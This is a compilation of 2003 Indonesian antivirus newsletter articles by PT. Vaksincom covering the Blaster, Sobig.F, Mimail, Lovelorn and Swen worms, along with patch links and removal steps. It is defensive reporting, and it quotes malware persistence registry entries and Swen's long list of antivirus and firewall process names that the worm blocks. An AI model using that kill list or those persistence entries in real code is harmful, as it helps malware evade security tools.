Jika tahun 2001 di nobatkan sebagai The Year of Living Dangerously bagi pengguna internet karena serangan “duet” dua worm CodeRed dan Nimda, dimana CodeRed menyebabkan server internet Microsoft IIS Server saling melakukan scanning dengan masif dan sempat menyebabkan lumpuhnya infrastruktur internet Indonesia dan Nimda yang spesialis menyerang email dan jaringan lokal pengguna internet.

Maka pada bulan Agustus 2003 ditemui duet serupa dengan munculnya Worm Blaster dan dan Sobig.F dimana Blastermenyebabkan semua komputer yang menggunakan sistem operasi (terutama) Windows XP / 2000 dan NT / 2003 saling melakukan scanning untuk menyebarkan dirinya dan Sobig.F menimbulkan dua masalah baru, yaitu bomb email bervirus dan spam peringatan virus pada mailserver.

Worm Blaster yang muncul perdana pada tanggal 12 Agustus 2003 dan variannya menyebabkan semua komputer Windows NT / 2000 / XP / 2003 saling melakukan scanning untuk menyebarkan dirinya. Beberapa pelanggan ISP yang menggunakan koneksi broadband cable modem paling merasakan penurunan performa bandwidth yang signifikan. Jika kasus CodeRed dapat diatasi dengan melakukan patching atas komputer server yang notabene mudah diakses oleh ISP, Blaster cukup sulit diatasi dan memerlukan usaha dan waktu yang sangat besar karena yang harus di patch adalah komputer pelanggan internet, baik pelanggan dial up maupun pelanggan broadband yang jumlahnya sangat banyak. Beberapa ISP bahkan sampai melakukan tindakan tegas untuk mematikan koneksi internet bagi pelanggan kabel modem yang tidak melakukan patching komputernya guna mencegah Blaster. Sedangkan Sobig.F yang muncul pada tanggal 19 Agustus 2003, menyebar melalui email dan memiliki kemampuan melakukan bom email. Sobig.F membawa korban mailserver korporat berguguran karena tidak mampu menangani datangnya email dalam jumlah yang sangat besar dan jumlahnya mencapai ribuan email dalam waktu singkat. Selain itu, program antivirus yang terinstal di mailserver yang secara otomatis mengirimkan peringatan atas adanya virus kepada email pengirim virus justru menimbulkan masalah baru karena email pengirim virus tersebut dipalsukan (forging) oleh Sobig.F dan menambahi bandwidth yang sudah penuh dengan spam email dan alamat email yang dipalsukan oleh Sobig.F tersebut aka n menerima bom email peringatan bahwa komputernya mengirimkan email bervirus.

Semua koneksi ISP Indonesia tercemar Blaster.

Menurut pemantauan yang dilakukan penulis pada hari awal September 2003, dimana penulis melakukan koneksi dial up ke 5 ISP di Jakarta CBN, Telkom, Indosat, Indonet dan Centrin. Setiap kali koneksi dial up dilakukan komputer yang kami gunakan selalu mendapatkan serangan pada port 135 dengan ukuran paket sebesar 48 dan dapat disimpulkan bahwa serangan dilakukan oleh Worm Blaster yang mengeksploitasi celah keamanan RPC Dcom (lihat gambar).

Selain itu, menurut scanning yang dilakukan pada saat yang sama pada IP dial up, terlihat bahwa s/d 40 % dari komputer dial up yang terkoneksi ke internet belum melakukan patching atas celah keamanan RPC Dcom dan kemungkinan besar sudah terinfeksi Blaster dan variannya. (lihat gambar)

RPC Dcom exploit adalah celah keamanan yang baru ditemukan pertengahan Juli 2003 pada produk Sistem Operasi Microsoft Windows NT / 2000 / XP / 2003 dimana celah keamanan ini memungkinkan penyusup dapat mengakses komputer yang mengandung celah keamanan tersebut tanpa perlu mengetahui Username atau Password yang biasa digunakan sebagai alat identifikasi untuk mengakses komputer. Yang dibutuhkan hanya program kecil dengan kode tertentu dan dengan mudah di dapatkan di internet. Sekali penyusup dapat mengakses komputer tersebut, banyak hal merugikan yang dapat dilakukan seperti mengkopi, merubah, menambahkan program backdoor sampai dengan menghapus isi harddisk.

Blaster adalah worm baru yang  menyebar melalui internet / jaringan komputer dan memiliki kemampuan memanfaatkan celah keamanan RPC Dcom untuk menyebarkan dirinya. Setiap komputer yang terhubung ke internet / jaringan dan belum melakukan patching (membenahi celah keamanan) RPC Dcom akan langsung terinfeksi oleh Blaster dan menjadi agen penyebaran Blaster itu sendiri. Salah satu gejala komputer terinfeksi Blaster adalah komputer meminta restart sendiri sewaktu terkoneksi ke internet.

Kebiasaan berkomputer yang aman masih belum dimiliki oleh pengguna internet Indonesia.

Apa yang menyebabkan Sobig.F dan Blaster dapat mengganas dan sampai saat ini bercokol sebagai virus nomor satu di kalangan pengguna internet dan menyedot bandwidth yang seharusnya dapat dipergunakan untuk hal-hal produktif hanya untuk menyebarkan dirinya. Sobig.F sebenarnya dapat diidentifikasi oleh program antivirus yang terupdate, Blaster dan variannya tidak akan dapat menginfeksi komputer yang secara teratur melakukan patch dan patch tersedia secara Gratis sejak pertengahan Juli 2003. Dengan kata lain, kedua virus ini dapat diatasi jika pengguna komputer menerapkan tindakan yang tepat pada komputernya dengan menginstal antivirus yang mengupdate secara otomatis ke internet dan melakukan patching otomatis pada komputernya.

Berbicara memang mudah, tetapi dalam kenyataannya jangankan komputer user yang menggunakan dial up, menurut pemantauan kami bahkan komputer server yang terkoneksi ke internet banyak yang tidak dilindungi dengna baik seperti tidak disiplin melakukan patch dan beberapa bahkan tidak dilindungi dengan firewall yang memungkinkan penyusup dengan mudah dapat mengidentifikasi dan menguasai komputer tersebut. Sampai saat artikel ini di buat, beberapa website milik pemerintah dan perusahaan besar seperti www.depkes.go.id dan www.disctarra.com masih belum melakukan patching atas RPC Dcom Exploit.

Solusi masalah ini tidak semudah menginstal antivirus dan menjalankan patch yang ukurannya 1 MB. Kebanyakan pengguna komputer tidak menyadari adanya masalah pada komputernya dan kalaupun menyadari masalah pada komputernya masih ada beberapa hambatan teknis seperti pada beberapa daerah di Indonesia dimana kecepatan koneksi internet sangat rendah sehingga memerlukan biaya dan usaha yang sangat besar untuk menginstall patch atau mengupdate program antivirus atau hambatan non teknis seperti takut menginstall patch karena menggunakan program bajakan dan kurangnya disiplin pengguna komputer untuk mengamankan komputernya secara reguler karena celah keamanan baru akan selalu ditemukan dan virus baru akan selalu bermunculan.

Solusi

Apapun kendalanya, yang jelas kerugian yang ditimbulkan oleh virus ini sudah sangat besar. Karena itu tindakan yang preventif dan kuratif untuk masalah virus dan sekuriti harus dilakukan. Tindakan kuratif yang dapat dilakukan untuk mengatasi Blaster dan Sobig.F saat ini adalah memberikan akses patch dan antivirus semudah mungkin bagi semua pengguna internet antara lain di setiap server ISP atau dalam bentuk CD yang harganya relatif murah tanpa perlu mendownload.

Sedangkan tindakan preventif yang perlu dilakukan adalah kampanye penggunaan internet yang aman seperti menggunakan program antivirus yang tepat dan memiliki kemampuan update ke internet secara otomatis, pengguna internet selalu mengikuti perkembangan ancaman terakhir. Hal ini perlu dilakukan secara berkesinambungan dan di dukung oleh semua pihak yang baik ISP, pengguna internet, vendor pemilik software, pers dan pemerintah.

Alfons Tanujaya

Antivirus Specialist PT. Vaksincom

Bulan Worm 2003     16 September 2003

Para pengguna komputer panik. ISP lumpuh. Mungkin ini adalah salah satu berita terbesar yang pernah dialami oleh kita semua para pengguna komputer di tahun 2003.  Dalam 1 minggu dari tanggal 12 Agustus sampai dengan 19 Agustus 2003 seluruh jaringan internet dunia hampir lumpuh total. Akses menjadi sangat lambat karena virus-virus worm yang mengganas. Adapun virus-virus tersebut adalah, W32/Blaster.A, W32/Nachi.A dan W32/Sobig.F@mm. Blaster dan Nachi menyerang para pengguna komputer dengan memanfaatkan celah keamanan yang ada di dalam Windows NT 4, Windows 2000, Windows XP dan Windows 2003. Pertama-tama virus ini akan memeriksa port 135 apakah dapat ditembus atau tidak. Dengan pengertian, apakah para pemakai komputer sudah melakukan penginstallan patch yang telah diberitahukan dan diberikan oleh Microsoft jauh-jauh hari sebelum hal ini tejadi. Kalau belum dengan mudahnya virus ini masuk ke dalam komputer yang belum dipatch. Jika virus ini sudah masuk ke dalam komputer anda, maka ada kejadian-kejadian yang tidak menyenangkan akan anda alami. Ketika anda sedang mengetik sesuatu komputer anda tiba-tiba akan meminta untuk direstart atau merestart dirinya sendiri. Cukup menjengkelkan bukan. Kejadian ini banyak sekali terjadi dan hampir seluruh para pengguna komputer dengan menggunakan system operasi windows NT4, 2K, XP dan 2K3 dan terhubung dengan sebuah jaringan internet. Ada sebuah kejadian yang dialami oleh para pengguna notebook. Ketika mereka terhubung dengan internet dan menggunakan dial-up langsung diserang oleh virus-virus tersebut. Dan pernah ada yang melapor ke Vaksin, notebooknya sampai tidak bisa lagi digunakan, karena terlalu seringnya virus itu meminta restart.

Bagaimana dengan virus W32/Sobig.F. Mungkin ini yang membuat lebih parahnya lagi para pengguna jaringan internet. Setelah seminggu penuh disibukkan oleh ulah Blaster, para pengguna internet tidak mendapatkan kesempatan bernafas lega, karena pada tanggal 18 Agustus 2003 telah muncul satu worm baru lagi. Kalau Blaster menyebar melalui jaringan antar komputer dengan sasaran utama sistem operasi Windows 2000 dan XP (Windows NT dan 2003 tidak terlalu dituju oleh Blaster) dan aktivitasnya dapat dipantau melalui Wormwatch, maka Sobig.F menyebar menggunakan cara lama, yaitu Email dan dapat dipantau melalui MessageLabs. Pada siang hari ketika PT. Vaksincom mendapatkan peringatan akan adanya worm ini, Sobig.F langsung menduduki peringkat 4 dalam Top 10 virus yang paling banyak dihentikan oleh MessageLabs, pelan tapi pasti Sobig.F menduduki peringkat 3 dan pada malam hari pukul 20.40 WIB telah menempati posisi pertama sebagai virus yang paling banyak dihentikan oleh MessageLabs. Uniknya, Sobig.F hanya aktif sampai tanggal 10 September 2003. Setelah tanggal 10 September 2003 jika kita menjalankan attach file yang terlampir maka Sobig.F ini tidak akan bereaksi. Apakah pembuatnya sudah mempersiapkan varian baru menjelang tanggal 10 September 2003 atau memang ada tujuan lain hanya waktu yang akan memberitahukan. Worm ini didisain untuk menyebarkan dirinya melalui jaringan dan mass-mail dengan menggunakan Simple Mail Transfer Protocol (SMTP) engine miliknya sendiri.

Pada bulan Agustus ini, mungkin telah menjadi trend para pembuat virus yang difokuskan untuk menyerang celah keamanan windows (RPC DCOM). Sebut saja virus Kelar.A and Kelar.B. yang adalah 2 buah virus yang mengandung kode jahat yang ikut meramaikan penyerang celah keamanan yang ada pada Microsof. Seperti virus-virus lainnya ia mengikuti cara kerja dari virus-virus Blaster yang menembus melalui prot 135. Perbedaannya adalah ia memanfatkan server IRC dalam penyebarannya.

Ada sebagian orang berpendapat, bahwa virus semacam Blaster dapat dimanfaatkan oleh seseorang untuk menyerang sebuah alamat domain. Pertama-tama orang tersebut memastikan bahwa alamat domain yang akan diserang belum dipatch celah keamanannya, setelah itu ia akan membuat sebuah virus semacam Blaster (atau varian dari Blaster) untuk menyerang alamat domain tersebut. Contohnya adalah virus Blaster.E. Virus ini akan menyerang sebuah alamat domain http://www. kimble.org.

Dan bagaimana di Indonesia ?

Di Indonesia pada setelah adanya penyerang oleh Blaster dan Sobig hampir menimbulkan kepanikan. Banyak para pengguna internet mengeluh karena susahnya membuka sebuah web site, atau mail servernya menjadi penuh. Hal ini terjadi, jika sebuah komputer terinfeksi oleh virus Sobig.F, maka ia akan mengirimkan secara massal keberbagai alamat email dirinya sendiri. Pengiriman ini terjadi 10 detik sekali. Dapat dibayangkan, bahwa kalau dalam sebuah kantor yang mempunyai client 10 saja, maka dalam waktu kurang dari 5 menit mail server dari perusahaan tersebut akan menjadi hang. Ini terjadi pada sebuah instasi pemerintah yang ada di Gatot Subroto. Mail server perusahaan tersebut tidak dapat menampung lagi pengiriman yang beribu-ribu email yang akan dikirim. Kemudian bandwith akan habis dipakai dalam pengiriman tersebut. Akhirnya, koneksi ke internet dan antar jaringan terasa lambat sekali.

Sebenarnya masalah-masalah tersebut dapat diminimalkan, karena jauh-jauh hari, Microsoft sudah mengeluarkan warning bahwa ada celah keamanan baru telah ditemukan. Ini diumumkan pada bulan Juli 2003. Kemudian ramai-ramainya pada bulan 11 Agustus 2003. Kalau kita mengikuti anjuran dari Microsoft untuk melakukan patch pada komputer kita, mungkin hal ini tidak akan terjadi serangan dari virus Blaster. Kemungkinan besar para pengguna komputer agak sungkan untuk mendownload patch tersebut. Karena untuk menjalankannya, windows 2000 harus sudah terinstall Service Pack 3 yang berukuran 130 mega lebih. Sebagai seorang pemakai Internet dengan menggunakan dailup, perlu waktu dan biaya yang besar untuk mendowload file yang berukuran besar. Oleh sebab itu, serangan dari virus Blaster sukses terjadi di Indonesia.

Banyak ISP di Indonesia menerima keluhan-keluhan, yang menyatakan bahwa jaringan internet yang mereka sediakan tidak berfungsi. Dalam hal ini mungkin mereka tidak dapat disalahkan juga 100%, yang menjadi masalah adalah client yang menggunakan jasa ISP tersebut telah menyerang komputer-komputer di dalam jaringan yang luas sekali. Pemakaian bandwith meningkat tajam, jadi banyak pemakai jasa internet tidak dapat login.

Dan untuk menjadi catatan bulan Agustus, virus yang banyak sekali menyebar adalah Redlof, Mimail, Lovelorn, Sobig.F dan Blaster. Mungkin untuk yang kesekian kalinya Redlof kami terima sebagai sebuah virus yang cukup sulit dibasmi. Setiap kali penanganan yang tuntas telah dilakukan, tetapi ada beberapa komputer yang benar-benar sulit sekali virus tersebut dibasmi. Memang ada cara yang cukup cepat untuk menghapus virus tersebut adalah dengan memformat harddisk anda, dan menginstall kembali dari awal. Tetapi ini bukan sebuah cara yang praktis. Banyak cara yang dapat dilakukan untuk menghapus virus tersebut, misalnya dengan memeriksa komputer anda dalam system SAFE MODE, kemudian matikan opsi Windows Script Host, lalu scan komputer anda dengan menggunakan antivirus yang terupdate data definisinya. Atau kalau anda gemar mengutak-atik file registri anda dapat melakukannya sesuai dengan petunjuk yang ada pada alamat web site ini : http://www.vaksin.com/virusnews/2002/1002/cure_redlof.htm dan

http://www.vaksin.com/virusnews/2002/1102/cure_redlof2.htm

Mimail adalah sebuah worm yang cukup unik dalam mencari alamat email di dalam sebuah komputer yang terinfeksi. Mengapa dikatakan cukup unik, kalau anda membaca artikel di bawah ini baru anda merasakan bahwa banyak sekali cara-cara yang dilakukan oleh para pembuat virus untuk mendapatkan sebuah alamat email untuk sarana penyebarannya. Anda perlu berhati-hati karena pada hari ini, Mimail bercokol di peringkat ke tiga sebagai worm yang paling banyak dihentikan oleh MessageLabs, tetapi pada sore hari waktu Indonesia Mimail langsung menempati peringkat pertama sebagai virus yang paling banyak dihentikan oleh MessageLabs. Virus ini menyebar melalui SMTP miliknya sendiri, dan selalu membawa sebuah file attach di dalam sebuah file MESSAGE.ZIP yang sebenarnya adalah sebuah file MESSAGE.HTML yang dikompres menggunakan UPX. Tetapi file HTML tersebut mengandung sebuah file Win32.EXE yang dikenal dengan nama FOO.EXE. Ketika file .ZIP tersebut dibuka,  virus ini akan menyerang celah keamanan yang ada di dalam program Internet Explorer, yang menginzinkan sebuah script dapat dijalankan pada komputer lokal. Adapun produk Microsoft yang diserang adalah : IE dan OE 5.x serta 6.0 (berita lengkapnya ada di http://www.vaksin.com/mimail.htm

Lovelorn adalah salah satu virus worm yang penyebarannya melalui email secara massal dan dibuat dengan menggunakan bahasa programing tingkat tinggi yaitu Borland C++. Sebagai saranan penyebarannya, virus ini akan membawa sebuah file attach dengan 2 versi sebagai file .HTML atau .EXE. Setelah salah satu file tersebut dijalankan, maka ia akan menambahkan 4 buah file pada direktori C:\Windows\System : explorer.exe, kernel32.exe, netdll.dll, sercscg.dll.  

Kemudian, virus ini akan membuat autorun registry entry untuk secara otomatis dijalankan setiap kali system startup:

HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\

explorer = %System%\explorer.exe

Ia juga mencoba untuk mengcopykan dirinya sebagai sebuah file yang bernama FINDFAST.EXE pada folder di mana berisi string startup, misalnya pada C:\Windows\Start Menu\Programs\ Startup. Virus ini akan meletakkan sebuah file yang merupakan copy dari dirinya sendiri pada semua folder yang mengandung file-file .HTM, file yang bervirus akan bernama sesuai dengan nama asli dari file .HTM kemudian ditambahkan dengan ektensi "KISS.ok.exe. Worm ini mengumpulkan list alamat penerima dari file-file yang mengandung alamat email pada file-file: .EML, .ITEM, .BOX, .DBX, .HTM. Email yang diterima akan berciri seperti berikut :

From: (acak)

. <nama komputer yang terinfeksi>

. lovelorn@...

Subject: (acak)

. Re:baby!your friend send this file to you !

. Re:Get Password mail...

. HELP??-

. Help

Message Body: (acak)

. Souvenir for you from file attach...

. See the Greeting-card .

. Play the game from file attach

. Help...

. Enjoy

Attachment: (acak)

. %a.Kiss.ok.exe

. %a.htm

- %a could be any of the following:

Keterangan lebih lanjut anda dapat melihat nya di : www.vaksin.com/remove_lovelorn.htm

Sobig dan Blaster, banyak sekali kali menerima email, terutama para pengguna Windows 2000 dan Windows XP. Mereka pada umumnya mengeluh, setiap kali komputernya minta restart terus menerus. Sampai-sampai kami memberikan secara gratis Service Pack dan Patch Dcom untuk Windows 2000 dan XP kepada para customer yang membeli produk antivirus Norman Antivirus Control pada kami. Jadi masalah pengudaptetan security di Windows sangatlah penting. Acapkali para pemakai komputer baru menyadari betapa pentingnya masalah tersebut. Oleh sebab itu, untuk mengetahui lebih awal berita apa saja mengenai Microsoft, khususnya masalah Security anda dapat berlangganan newsletter Microsoft dengan mendaftarkan diri anda pada alamat web site ini :

http://www.microsoft.com/security/security_bulletins/decision.asp

Setelah ini, apakah akan adakah virus-virus yang lebih kompleks cara penularannya ?

Jawabannya adalah YA !!. Karena beberapa hari yang lalu sebuah perusahaan yang bergerak dalam bidang security jaringan, telah menemukan sebuah celah keamanan yang baru lagi. Perusahaan tersebut adalah Eeye Digital Security (http://www.eeye.com). Bisa dikatakan ini adalah Microsoft RPC Heap Corruption Vulnerability - Part II.  Belum hilang dari ingatan kita dengan berjangkitnya virus-virus worm yang baru yang meyerang celah keamanan RPC DCOM seperti Nachi, Blaster, Microsoft telah mengeluarkan sebuah pengumuman bahwa telah ditemukannya celah keamanan yang baru dan ini mendapat perioritas yang sangat mendesak (kritis).  Celah keamanan ini dapat dibuka dan mengizinkan sebuah malicious user yang menyebabkan sebuah serangan Denial of Service atau mengesekusi code yang berubah-ubah pada sebuah komputer yang terinfeksi. Seperti diketahui bahwa celah keamanan yang terdahulu (yang ditemukan pada bulan 20 Juli 2003), telah dapat mengekploit  code untuk menjadi serangan Denial of Service. Celah keamanan adalah baru dan menunjukkan sebuah perbedaan RPC vulnerability dengan yang ditemukan pada bulan Juli. Dikatakan oleh perusahan eEye, bahwa ada 3 celah keamanan yang baru. Dan system windows yang berpotensi untuk diserang adalah Windows NT4, Windows 2000, Windows XP dan Windows Server 2003 - anda dapat membaca pada alamat web site eEye -(http://www.eeye.com/html/Research/Advisories/AD20030910.html). 2 dari 3 celah keamanan ini terutama sekali bersifat sangat berbahaya dan dapat mengizinan serangan secara remote untuk mengesekusi code yang bermacam-macam pada komputer yang terinfeksi. Microsoft menginstruksikan untuk mendownload path yang telah tersedia. Anda dapat mendownloadnya melalui alamat link di bawah ini sesuai dengan system komputer yang anda gunakan.

Windows NT Workstation:
<http://www.microsoft.com/downloads/details.aspx?FamilyId=7EABAD74-9CA9-48F4-8DB5-CF8C188879DA&displaylang=en>

Windows NT Server 4.0:
<http://www.microsoft.com/downloads/details.aspx?FamilyId=71B6135C-F957-4702-B376-2DACCE773DC0&displaylang=en>

Windows NT Server 4.0, Terminal Server Edition:
<http://www.microsoft.com/downloads/details.aspx?FamilyId=677229F8-FBBF-4FF4-A2E9-506D17BB883F&displaylang=en>

Windows 2000:
<http://www.microsoft.com/downloads/details.aspx?FamilyId=F4F66D56-E7CE-44C3-8B94-817EA8485DD1&displaylang=en>

Windows XP:
<http://www.microsoft.com/downloads/details.aspx?FamilyId=5FA055AE-A1BA-4D4A-B424-95D32CFC8CBA&displaylang=en>

Windows Server 2003:
<http://www.microsoft.com/downloads/details.aspx?FamilyId=51184D09-4F7E-4F7B-87A4-C208E9BA4787&displaylang=en>

Artikel mengenai hal ini akan kami sajikan pada kesempatan yang akan datang.

Statistik Kasus Virus pada bulan Agustus 2003

Geminiman

W32/Swen.A@mm memalsukan update Microsoft    19 September 2003

Sekali terjerat korban sulit lepas

Pengguna internet Indonesia harap berhati-hati jika menerima email dari Microsoft yang mengaku sebagai update patch, karena isinya bukan patch tetapi Worm baru yang bernama Swen.

Setelah di dera oleh Blaster yang hanya dapat diatasi dengan melakukan update patch, pengguna internet Indonesia mendapatkan ancaman dari worm baru pada tanggal 19 September 2003 yang dengan kreatif memalsukan diri sebagai kiriman Update Patch dari Microsoft lengkap dengan logo dan gambar yang sangat meyakinkan sehingga pengguna awam akan dengan mudah percaya dan menjalankan file tersebut.

Worm baru yang datang dengan nama Swen worm ini langsung menduduki peringkat pertama sebagai virus yang paling banyak dihentikan di internet pada tanggal 19 September 2003 dan banyak hal-hal menarik yang dapat digali dari Swen ini karena melakukan beberapa rekayasa tampilan guna mengelabui pengguna internet. Adapun beberapa catatan penting yang kami lihat pada Swen adalah sebagai berikut :

• Memiliki kemampuan menyebar menggunakan banyak media.

Swen mampu menyebarkan dirinya melalui Email, Kazaa (peer to peer sharing), IRC, Newsgroup dan LAN (Local Area Network).

• Memiliki kemampuan menjalankan dirinya sendiri meskipun lampiran tidak di klik oleh penerima email

Swen mengeksploit Imime exploit sehingga pengguna Outlook yang belum melakukan patching atas softwarenya tetap akan terinfeksi oleh worm ini sekalipun ia tidak pernah menjalankan lampiran. Cukup dengan preview / membaca email yang datang maka worm ini akan langsung beraksi menginfeksi komputer anda.

• Memalsukan dirinya sebagai update Microsoft dengan tipuan tampilan yang nyaris sempurna.

  Jika anda tertipu dengan tampilan email yang cantik dan percaya bahwa email ini datang dari Microsoft, ini merupakan awal dari tampilan tipuan lain yang akan anda alami. Anda akan ditanya apakah ingin melakukan install update patch (yang sebenarnya virus) atau tidak dengan tampilan :

Jika anda mengklik "Yes", Swen akan menginstal dirinya dan memberikan tampilan seakan-akan dari Microsoft sebagai berikut :

     

Jika anda mengklik "No" Swen tetap akan menginstalkan dirinya di background tanpa anda ketahui :(.

• Memiliki daftar smtp dan nntp server sendiri dan (sekali lagi) mengelabui pengguna dengan tampilan palsu jika tidak berhasil mendapatkan smtp server dari registri.

Swen memiliki daftar smtp dan nntp server sendiri, selain itu ia memiliki kemampuan mendeteksi smtp server komputer korbannya dari file registri. Jika tidak berhasil menemukan smtp server dari registri Swen akan menampilkan layar palsu lagi dan meminta pengguna komputer untuk memasukkan smtp servernya.

• Melumpuhkan Registry Editor

Dalam rangka emlindungi dirinya dari pembersihan, Swen memblokir akses ke registri editor dengan menambahkan string :

 [HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Policies\System]
 "DisableRegistryTools" = dword:00000001
 

dan jika komputer yang terinfeksi menjalankan Registri Editor akan mendapatkan pesan eror palsu :

• Menguasai semua file executable

Swen memanipulasi registri sehingga semua akses ke file executable seperti .bat .scr .exe .reg dan .pif dikausai olehnya dan jika anda menjalankan semua file dengan akhiran tersebut di atas akan berakibat mengaktifkan dirinya

• Melumpuhkan firewall dan antivirus

Swen akan melengkapi aksinya dengan melumpuhkan firewall dan program antivirus dan MEMBLOK AKSES semua program dengan nama file sebagai berikut :

Azonealarm
zapro
wfindv32
webtrap
vsstat
vshwin32
vsecomr
vscan
vettray
vet98
vet95
vet32
vcontrol
vcleaner
tds2
tca
sweep
sphinx
serv95
safeweb
rescue
regedit
rav
pview
pop3trap
persfw
pcfwallicon
pccwin98
pccmain
pcciomon
pavw
pavsched
pavcl
padmin
outpost
nvc95
nupgrade
nupdate
normist
nmain
nisum
navw
navsched
navnt
navlu32
navapw32
nai_vs_stat
msconfig
mpftray
moolive
luall
lookout
lockdown2000
kpfw32
jedi
iomon98
iface
icsupp
icssuppnt
icmoon
icmon
icloadnt
icload95
ibmavsp
ibmasn
iamserv
iamapp
gibe
f-stopw
frw
fp-win
f-prot95
fprot95
f-prot
fprot
findviru
f-agnt95
espwatch
esafe
efinet32
ecengine
dv95
claw95
cfinet
cfind
cfiaudit
cfiadmin
ccshtdwn
ccapp
bootwarn
blackice
blackd
avwupd32
avwin95
avsched32
avp
avnt
avkserv
avgw
avgctrl
avgcc32
ave32
avconsol
autodown
apvxdwin
aplica32
anti-trojan
ackwin32
_avp

Cara untuk membersihkan Swen akan kami berikan dalam artikel yang berikut. Tentunya anda bertanya-tanya, bagaimana dapat membersihkan komputer yang telah terinfeksi Swen dimana Registri Editor telah dilumpuhkan dan semua file executable juga telah dikuasai oleh virus. Sehingga tidak memungkinkan untuk menjalankan virus removal tools yang umumnya berekstensi .exe dan .com. Jika anda tidak sabar menunggu jawabannya, silahkan hubungi kami atau akses website www.vaksin.com/clean_swen.htm .

salam dan selamat libur panjang,

PT. Vaksincom

Bermain catur dengan Swen     19 September 2003

Bagaimana menguasai kembali komputer yang dikuasai Swen

Berdasarkan pemantauan yang dilakukan oleh PT. Vaksincom, Worm Swen ternyata memakan cukup banyak korban di Indonesia. Terbukti dari banyakanya permintaan informasi mengembalikan perubahan registri yang dilakukan oleh Swen. Swen memang secara cerdik merubah semua registri dan melumpuhkan "regedit" yang biasanya digunakan sebagai alat untuk mengedit registri. Namun resiko dari kesalahan editing atas registri cukup besar dan tidak mudah dilakukan oleh pengguna komputer awam. Karena itu, PT. Vaksincom menyarankan anda untuk menggunakan tools yang diciptakan oleh Norman dan dapat anda download secara Gratis dari www.norman.com.

Untuk semua pelanggan PT. Vaksincom dan kontributor Gerakan Virus Indonesia akan mendapatkan kiriman tools secara otomatis.

Cara mengatasi Worm W32/Swen.A@mm

 Salah satu aksi yang akan dilakukan oleh worm ini adalah men-disable Registry Editor agar tidak dapat dijalankan. Untuk mengatasi masalah ini Norman Virus Control telah membuat Removal Tools yang akan mengatasi worm W32/Swen.A@mm.

Beberapa hal yang akan dilakukan oleh tools ini adalah:

1. Menghentikan proses dari worm

2. Menghapus file-file yang diciptakan oleh Worm W32/Swen.A@mm
3. Membersihkan file-file yang terinfeksi Wom W32/Swen.A@mm
4. Menghapus value registry yang dirubah oleh Swen :
   1. HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistryTools
   2. HKLM\Software\Microsoft\Windows\CurrentVersion\RunServices\Driver32
   3. HKLM\Software\Microsoft\Windows\CurrentVersion\Run\karakter acak
5. Melakukan set ulang pada registry yang telah dimodofikasi oleh virus
   1. HKCR\exefile\shell\open\command to "%1" %*
   2. HKCR\regfile\shell\open\command to regedit "%1"
   3. HKCR\scrfile\shell\open\command to "%1" /S
   4. HKCR\scrfile\shell\config\command to %1
   5. HKCR\piffile\shell\open\command to "%1" %*
   6. HKCR\batfile\shell\open\command to "%1" %*
   7. HKCR\comfile\shell\open\command to "%1" %*

Langkah-langkah untuk menjalankan tools :

v             Download Removal Tools "Swenfix.com" dari situs www.norman.com

v             Double klik file "Swenfix.com", akan muncul layar konfirmasi dibawah ini (gambar 1) :

                                                Gambar 1

Klik [Setup] untuk melanjutkan. Anda akan mendapatkan layar dibawah ini (gambar 2). Tekan [sembarang tombol] untuk memulai proses pengecekan:

                                                            Gambar 2

 v     Hasil Scanning dapat dilihat pada layar dibawah ini :

                                                                        Gambar 3

v     Sekarang  Registry Editor telah dapat dijalankan.

PT. Vaksincom

AJT

Evaluasi virus September 2003     3 Oktober 2003

Mungkin untuk bulan September 2003 ini, tidak terlalu sibuk kita menghadapi virus-virus worm yang akhir-akhir ini merajalela seperti Blaster dan Sobig.F. Serangan mereka yang bertubi-tubi mungkin terasa sampai ke perusahaan atau para pemakai komputer pribadi. Yang mereka rasakan adalah betapa lambatnya koneksi internet, ini diakibatkan oleh trafik yang begitu padat yang diciptakan oleh virus-virus tersebut di atas. Pemakaian bandwith begitu tinggi sehingga menjadikan ISP/Server menjadi sangat-sangat sibuk dibuatnya.

Kita bisa bernafas sedikit sampai pada pertengahan bulan September 2003, karena pada tanggal 19 September 2003, muncul sebuah virus worm baru yang cukup merepotkan para pemakai komputer dan sudah pasti yang menggunakan jasa internet sebagai penghubung antar jaringan komputer. Worm tersebut dikenal sebagai W32/Swen atau dikenal juga sebagai varian virus Gibe.F. Virus dengan kreatif memalsukan diri sebagai kiriman Update Patch dari Microsoft lengkap dengan logo dan gambar yang sangat meyakinkan sehingga pengguna awam akan dengan mudah percaya dan menjalankan file tersebut.

Ada beberapa hal yang cukup menarik dari virus ini antara lain :

1. Memiliki kemampuan menyebar menggunakan banyak media.

2. Memiliki kemampuan menjalankan dirinya sendiri meskipun lampiran tidak di klik oleh penerima email.

3. Memalsukan dirinya sebagai update Microsoft dengan tipuan tampilan yang nyaris sempurna.

4. Memiliki daftar smtp dan nntp server sendiri dan (sekali lagi) mengelabui pengguna dengan tampilan palsu jika tidak berhasil mendapatkan smtp server dari registri.
   Melumpuhkan Registry Editor. Dalam rangka melindungi dirinya dari pembersihan, Swen memblokir akses ke registri editor dengan menambahkan string :
   [HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Policies\System]
    "DisableRegistryTools" = dword:00000001

5. Menguasai semua file executable. Swen memanipulasi registri sehingga semua akses ke file executable seperti .bat .scr .exe .reg dan .pif dikausai olehnya dan jika anda menjalankan semua file dengan akhiran tersebut di atas akan berakibat mengaktifkan dirinya

6. Melumpuhkan firewall dan antivirus. Virus ini akan mematikan semua program antivirus dan firewall.

Kalau dilihat pada point 5 dan 6, adalah sebuah kemajuan cara berpikir dari seorang pembuat virus. Ia sudah memikirkan bahwa kalau virus sudah menyerang komputer pasti akan membuat value pada registry. Oleh sebab itu ia memblok akses dalam penggunaan seluruh program executable dan khususnya progam Registry Editor (Regedit.exe). Bisa dibayangkan betapa sulitnya kalau anda pemakai komputer yang menggunakan system operasi Windows 2000 dan XP yang tidak mempunyai fasilitas MS DOS. Karena kalau tidak dapat menggunakan regedit.exe, bagaimana caranya agar dapat menggunakan komputer tersebut. Kalau kita menggunakan system operasi Windows 9.x, kita dapat menjalankan perbaikan melalui dos prompt. Dengan cara merestore sebuah file registry yang telah kita buat atas petunjuk dari beberapa vendor antivirus. Dengan cara :

1.       Masuk ke C:\cd\windows (tekan enter)

2.       C:\Windows\Regedit C:\temp\benar.reg (ini jika file benar.reg yang berisi string perbaikan terletak pada folder C:\temp)

